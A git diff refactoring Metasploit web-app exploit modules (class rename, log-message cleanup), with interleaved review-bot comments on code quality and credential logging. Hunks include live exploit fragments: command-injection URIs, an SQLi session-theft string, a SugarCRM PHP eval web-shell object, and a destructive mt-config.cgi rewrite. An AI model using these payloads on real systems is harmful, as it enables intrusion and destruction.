+++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/pajax_remote_exec.rb b/modules/exploits/unix/webapp/pajax_remote_exec.rb index d53edeb6e2..711533e4f3 100644 --- a/modules/exploits/unix/webapp/pajax_remote_exec.rb +++ b/modules/exploits/unix/webapp/pajax_remote_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 722f946e36..b33f1a45bc 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote rand_key_value = rand_text_alphanumeric(rand(10)+6) # send check - print_status("#{peer} - Sending check") + print_status("Sending check") begin res = send_request_cgi({ 'method' => 'GET', @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe 
@@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote rand_key_value = rand_text_alphanumeric(rand(10)+6) # send payload - print_status("#{peer} - Sending payload (#{code.length} bytes)") + print_status("Sending payload (#{code.length} bytes)") begin res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" }) if res and res.code == 500 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb index 4c57758421..07671c52e1 100644 --- a/modules/exploits/unix/webapp/php_eval.rb +++ b/modules/exploits/unix/webapp/php_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb index 960c8387dd..5ce9472bb2 100644 --- a/modules/exploits/unix/webapp/php_include.rb +++ b/modules/exploits/unix/webapp/php_include.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index c8edda9b97..70a7a5713e 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body) if b return b.captures[0] - elsif datastore['HTTP::chunked'] == true + elsif datastore['HTTP::chunked'] b = /chunked Transfer-Encoding forbidden/.match(res.body) if b fail_with(Failure::Unknown, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.') diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index 996a060a4b..fedf43dcfc 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body) if b return b.captures[0] - elsif datastore['HTTP::chunked'] == true + elsif datastore['HTTP::chunked'] b = /chunked Transfer-Encoding forbidden/.match(res.body) if b fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.') diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 009305625b..92159e9983 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
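Review bot: Replacing `datastore['HTTP::chunked'] == true` with `datastore['HTTP::chunked']` changes the test from "is exactly true" to "is anything except nil or false". If the datastore can return this option as a string (not visible here), the value `"false"` would now select the branch. The only effect in this hunk is the extra match for the "chunked Transfer-Encoding forbidden" text, so the impact is small. A comment such as `# HTTP::chunked is normalised to a boolean before this point` would make the assumption explicit. The same edit is made in php_xmlrpc_eval.rb in a later hunk on this line, and both enclosing methods start outside their hunks.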
diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 9775cd9fb0..2505a8901e 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 402c9a0d33..6149f0a6cf 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => "#{base}/tools#{uri}"}) if res and res.code == 404 - print_error("#{peer} - The upload most likely failed") + print_error("The upload most likely failed") return end @@ -123,15 +123,15 @@ class Metasploit3 < Msf::Exploit::Remote p = get_write_exec_payload(:unlink_self=>true) - print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") + print_status("Uploading PHP payload (#{p.length.to_s} bytes)...") res = upload_php(base, php_fname, p, folder_name) if not res - print_error("#{peer} - No response from server") + print_error("No response from server") return end - print_status("#{peer} - Executing '#{php_fname}'...") + print_status("Executing '#{php_fname}'...") exec_php(base, res) end end diff --git a/modules/exploits/unix/webapp/projectsend_upload_exec.rb b/modules/exploits/unix/webapp/projectsend_upload_exec.rb index d61721a33b..0600c02ad9 100644 --- a/modules/exploits/unix/webapp/projectsend_upload_exec.rb 
+++ b/modules/exploits/unix/webapp/projectsend_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -59,19 +59,19 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, 'process-upload.php') ) if !res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - vprint_error("#{peer} - No process-upload.php found") + vprint_error("No process-upload.php found") return Exploit::CheckCode::Safe elsif res.code.to_i == 500 - vprint_error("#{peer} - Unable to write file") + vprint_error("Unable to write file") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/ - vprint_error("#{peer} - File process-upload.php is not executable") + vprint_error("File process-upload.php is not executable") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/ - vprint_error("#{peer} - Software is misconfigured") + vprint_error("Software is misconfigured") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/ # response on revision 118 onwards includes the file name @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ return Exploit::CheckCode::Appears elsif res.body && res.body =~ /Failed to open output stream/ - vprint_error("#{peer} - Upload folder is not writable") + vprint_error("Upload folder is not writable") return Exploit::CheckCode::Safe else return Exploit::CheckCode::Detected 
@@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}")) post_data = data.to_s - print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)") + print_status("Uploading file '#{fname}' (#{php.length} bytes)") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"), @@ -121,14 +121,14 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured") # response on revision 118 onwards includes the file name elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/ - print_good("#{peer} - Payload uploaded successfully (#{fname})") + print_good("Payload uploaded successfully (#{fname})") return fname # response on revisions 100 to 117 does not include the file name elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ - print_warning("#{peer} - File upload may have failed") + print_warning("File upload may have failed") return fname else - vprint_status("#{peer} - Received response: #{res.code} - #{res.body}") + vprint_status("Received response: #{res.code} - #{res.body}") fail_with(Failure::Unknown, "#{peer} - Something went wrong") end end 
@@ -137,18 +137,18 @@ class Metasploit3 < Msf::Exploit::Remote # Execute uploaded file # def exec(upload_path) - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_raw( { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5 ) if !res - print_status("#{peer} - Request timed out while executing") + print_status("Request timed out while executing") elsif res.code.to_i == 404 - vprint_error("#{peer} - Not found: #{upload_path}") + vprint_error("Not found: #{upload_path}") elsif res.code.to_i == 200 - vprint_good("#{peer} - Executed #{upload_path}") + vprint_good("Executed #{upload_path}") else - print_error("#{peer} - Unexpected reply") + print_error("Unexpected reply") end end diff --git a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb index 5e43183164..90cab50a10 100644 --- a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb +++ b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index 113f7cc419..fa917c7e4e 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/seportal_sqli_exec.rb b/modules/exploits/unix/webapp/seportal_sqli_exec.rb index d5385a3fd3..f71b7fd44c 100644 --- a/modules/exploits/unix/webapp/seportal_sqli_exec.rb +++ b/modules/exploits/unix/webapp/seportal_sqli_exec.rb 
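Review bot: `def exec(upload_path)` in projectsend_upload_exec.rb overrides Kernel#exec for instances of this class, so a later call meant for the Kernel method would silently issue an HTTP request instead. A distinct name such as `exec_uploaded_file(upload_path)` avoids that; the call site is outside this hunk and would change with it. The same applies to the parameterless `def exec` in simple_e_document_upload_exec.rb (hunk at -129,7). A comment on the `if !res` branch saying why a timeout is reported with `print_status` rather than as an error would also help.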
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version.to_f <= 2.5 return Exploit::CheckCode::Appears @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + print_status("Logging in as user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "login.php"), @@ -94,8 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 and res.get_cookies =~ /sessionid=([a-zA-Z0-9]+)/ session = $1 - print_status("#{peer} - Login successful") - print_status("#{peer} - Session cookie is [ #{session} ]") + print_status("Login successful") + print_status("Session cookie is [ #{session} ]") else fail_with(Failure::Unknown, "#{peer} - Login was not succesful!") end @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << "FROM seportal_sessions WHERE session_user_id=1 LIMIT 1" sqli << "),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '0x#{sqls}'='0x#{sqls}" - print_status("#{peer} - Retrieving admin session through SQLi") + print_status("Retrieving admin session through SQLi") res = send_request_cgi({ 'method' => 'POST', 'vars_get' => { "sp_id" => sqli }, 
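Review bot: `print_status("Session cookie is [ #{session} ]")` in seportal_sqli_exec.rb (hunk at -94,8) writes a live session identifier to the console and to any spooled output at normal verbosity, and the `Admin session is [ ... ]` line in the -119,7 hunk does the same for the admin session. Session tokens are credentials, so `vprint_status` would keep them out of routine logs unless verbose output is requested. Separately, `session = $1` reads more clearly as `session = Regexp.last_match(1)`, and the condition mixes `&&` with `and`.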
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/ adminhash = $1 - print_status("#{peer} - Admin session is [ #{adminhash} ]") + print_status("Admin session is [ #{adminhash} ]") else fail_with(Failure::Unknown, "#{peer} - Retrieving admin session failed!") end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Uploading payload [ #{payload_name} ]") + print_status("Uploading payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin", "downloads.php"), @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Requesting payload [ #{uri}/data/down_media/#{payload_name} ]") + print_status("Requesting payload [ #{uri}/data/down_media/#{payload_name} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "data", "down_media", "#{payload_name}") @@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb index 5503487ccc..b0e2edb30b 100644 --- a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb +++ b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
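Review bot: The final check in seportal_sqli_exec.rb (hunk at -166,7), `if res and res.code != 200`, stays silent when `res` is nil, although the comment above it says any non-200 outcome is suspicious. If a missing response should be reported too, `unless res && res.code == 200` covers it. If a timeout is expected here because the request blocks, a comment saying so would stop the next reader from "fixing" it. The enclosing `exploit` method starts outside this hunk.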
@@ -69,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.body and res.body.to_s =~ /File Uploading Has Been Disabled/ - vprint_error("#{peer} - File uploads are disabled") + vprint_error("File uploads are disabled") return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"") post_data = data.to_s - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'upload.php'), @@ -113,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotFound, "#{peer} - No upload.php found") if res.code.to_i == 404 fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{@fname}") if res.body and (res.body =~ /Couldn't copy/ or res.body !~ /file uploaded\!/) - print_good("#{peer} - Payload uploaded successfully.") + print_good("Payload uploaded successfully.") register_files_for_cleanup(@fname) if res.body.to_s =~ /<br>folder to use: .+#{target_uri.path}\/?(.+)<br>/ @upload_path = normalize_uri(target_uri.path, "#{$1}") - print_good("#{peer} - Found upload path #{@upload_path}") + print_good("Found upload path #{@upload_path}") else @upload_path = normalize_uri(target_uri.path, 'in') - print_warning("#{peer} - Could not find upload path - assuming '#{@upload_path}'") + print_warning("Could not find upload path - assuming '#{@upload_path}'") end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote # Executes our uploaded malicious file # def exec - print_status("#{peer} - Executing #{@fname}...") + print_status("Executing #{@fname}...") res = send_request_raw({ 'uri' => normalize_uri(@upload_path, @fname), 'cookie' => 'access=3' 
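Review bot: The upload-path pattern in simple_e_document_upload_exec.rb (hunk at -113,15) interpolates `target_uri.path` into the regex unescaped, so a configured path containing `.`, `+` or `(` changes what the pattern matches or makes it raise RegexpError. `#{Regexp.escape(target_uri.path)}` inside the pattern fixes that. `"#{$1}"` can be `Regexp.last_match(1)`. The enclosing method starts outside the hunk.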
diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index 3bdd447427..1e47de44e0 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient @@ -91,7 +91,7 @@ print "LFI test for storable flaw is: $frozen\n"; =end def check - vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure") + vprint_status("Sending storable test injection for XXXCHECKXXX.pm load failure") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), @@ -103,14 +103,14 @@ print "LFI test for storable flaw is: $frozen\n"; }) unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm") - vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test"); + vprint_status("Failed XXXCHECKXXX.pm load test"); return Exploit::CheckCode::Safe end Exploit::CheckCode::Vulnerable end def exploit - if datastore['DESTRUCTIVE'] == true + if datastore['DESTRUCTIVE'] exploit_destructive else exploit_nondestructive 
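Review bot: Replacing `datastore['DESTRUCTIVE'] == true` with a bare truthiness test in sixapart_movabletype_storable_exec.rb (hunk at -103,14) widens the condition, because in Ruby every value other than nil and false is truthy, including the string "false". If the option can reach this point un-normalised (not visible here; it depends on how the option is registered and validated), the module would take `exploit_destructive`, which the later hunks show unlinks and rewrites mt-config.cgi on the target. Since that branch is not reversible, I would keep the strict comparison or add a comment stating that the value is a validated boolean. The `vprint_status(...)` line in the same hunk also keeps a stray trailing `;`.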
@@ -158,14 +158,14 @@ print "RCE payload requiring Object::MultiType and DateTime: $frozen\n"; =end def exploit_nondestructive - print_status("#{peer} - Using nondestructive attack method") + print_status("Using nondestructive attack method") config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b" config_payload << payload.encoded.unpack('H*')[0] config_payload << "7d293b" config_payload << "23" * (1025 - payload.encoded.length) config_payload << "0a657869743b" - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") send_request_cgi({ 'method' => 'GET', @@ -201,10 +201,10 @@ print "RCE unlink payload requiring CGI: $frozen\n"; =end def exploit_destructive - print_status("#{peer} - Using destructive attack method") + print_status("Using destructive attack method") # First we need to delete mt-config.cgi using the storable injection - print_status("#{peer} - Sending storable injection to unlink mt-config.cgi") + print_status("Sending storable injection to unlink mt-config.cgi") res = send_request_cgi({ 'method' => 'GET', @@ -224,7 +224,7 @@ print "RCE unlink payload requiring CGI: $frozen\n"; # Now we rewrite mt-config.cgi to accept a payload - print_status("#{peer} - Rewriting mt-config.cgi to accept the payload") + print_status("Rewriting mt-config.cgi to accept the payload") res = send_request_cgi({ 'method' => 'GET', 
@@ -247,7 +247,7 @@ print "RCE unlink payload requiring CGI: $frozen\n"; # Finally send the payload - print_status("#{peer} - Sending payload request") + print_status("Sending payload request") send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb index a67c67bbb0..3f4535f7cc 100644 --- a/modules/exploits/unix/webapp/skybluecanvas_exec.rb +++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw('uri' => uri) if res and res.body =~ /[1.1 r248]/ - vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found") + vprint_good("SkyBlueCanvas CMS 1.1 r248-xx found") return Exploit::CheckCode::Appears end @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = normalize_uri(target_uri.path.to_s, "index.php") - vprint_status("#{peer} - Sending request to #{uri}.") + vprint_status("Sending request to #{uri}.") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index fdfed0a499..1633e81cde 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/spip_connect_exec.rb b/modules/exploits/unix/webapp/spip_connect_exec.rb index 06bd9ecd7c..5d7cc5c5e9 100644 --- a/modules/exploits/unix/webapp/spip_connect_exec.rb +++ b/modules/exploits/unix/webapp/spip_connect_exec.rb 
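Review bot: `res.body =~ /[1.1 r248]/` in skybluecanvas_exec.rb's check (hunk at -66,7) is a bracket expression, so it matches any body that contains a single `1`, `.`, space, `r`, `2`, `4` or `8`, and the check reports Appears for almost any non-empty response. The literal version string needs `/1\.1 r248/`, or `/\[1\.1 r248\]/` if the page prints the brackets. The false positive matters to anyone who uses the check result to decide whether a host needs attention. The enclosing method starts outside the hunk.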
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb index a8303ca871..bd489e6b3a 100644 --- a/modules/exploits/unix/webapp/squash_yaml_exec.rb +++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb index a116da0fa5..61eba13594 100644 --- a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb +++ b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index 6c08aaa9af..a659def99d 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -63,11 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote f = "pathCache.php" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{f}") + print_warning("Deleting #{f}") client.fs.file.rm(f) - print_good("#{peer} - #{f} removed to stay ninja") + print_good("#{f} removed to stay ninja") rescue - print_warning("#{peer} - Unable to remove #{f}") + print_warning("Unable to remove #{f}") end end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)") end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") data = "module=Contacts&" data << "Contacts2_CONTACT_offset=1&" @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote #O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";} data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30=" - print_status("#{peer} - Exploiting the unserialize()") + print_status("Exploiting the unserialize()") res = send_request_cgi( { @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Exploit failed: #{res.code}") end - print_status("#{peer} - Executing the payload") + print_status("Executing the payload") res = send_request_cgi( { diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index 04e6167531..de46b20848 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb 
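Review bot: The bare `rescue` around `client.fs.file.rm(f)` in sugarcrm_unserialize_exec.rb (hunk at -63,11) discards the exception, so the operator sees only "Unable to remove" and cannot tell a permission problem from a missing file. `rescue => e` with `print_warning("Unable to remove #{f}: #{e.message}")` keeps the behaviour and records the cause, which also tells whoever cleans up afterwards that pathCache.php was left on the host. The method starts outside the hunk.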
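Review bot: `print_status("Login successful with #{username}:#{password}")` in sugarcrm_unserialize_exec.rb (hunk at -107,7) writes the cleartext password to the console and any spooled output at normal verbosity; the same pattern is in `do_login` in tuleap_unserialize_exec.rb (hunk at -74,7). Reporting only the account, `print_status("Login successful as #{username}")`, keeps engagement logs free of credentials. The `fail_with` line just above it has the same issue.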
